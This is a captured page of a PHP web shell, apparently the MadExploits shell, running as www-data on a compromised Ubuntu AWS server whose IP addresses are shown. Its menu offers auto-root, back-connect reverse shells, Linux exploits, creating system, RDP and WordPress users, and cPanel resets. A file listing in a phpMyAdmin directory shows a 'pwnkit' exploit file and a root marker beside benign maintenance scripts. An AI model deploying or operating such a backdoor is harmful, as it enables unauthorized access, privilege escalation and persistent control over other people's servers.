Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.216.219.130
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
internal
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
console
1.31
KB
-rwxr-xr-x
generate-mo
752
B
-rwxr-xr-x
match-twig-cache
806
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
remove-incomplete-mo
1.77
KB
-rwxr-xr-x
transformations_generator_main...
471
B
-rwxr-xr-x
transformations_generator_plug...
1.97
KB
-rwxr-xr-x
update-po
2.37
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : match-twig-cache
#!/usr/bin/env php <?php /* vim: set expandtab sw=4 ts=4 sts=4 ft=php: */ declare(strict_types=1); if (! defined('ROOT_PATH')) { define('ROOT_PATH', dirname(__DIR__) . DIRECTORY_SEPARATOR); } $tmpDir = ROOT_PATH . 'twig-templates'; /* Read replacements file */ $replacements = json_decode(file_get_contents($tmpDir . '/replace.json'), true); /* Read files list */ $filesList = file_get_contents($tmpDir . '/filesList'); $options = getopt('', ['reverse::']); foreach ($replacements as $templateName => $data) { if (isset($options['reverse'])) { $filesList = str_replace($data[0], $templateName, $filesList); } else { $filesList = str_replace($templateName, $data[0], $filesList); } } /* Write back files list */ file_put_contents($tmpDir . '/filesList', $filesList);
Close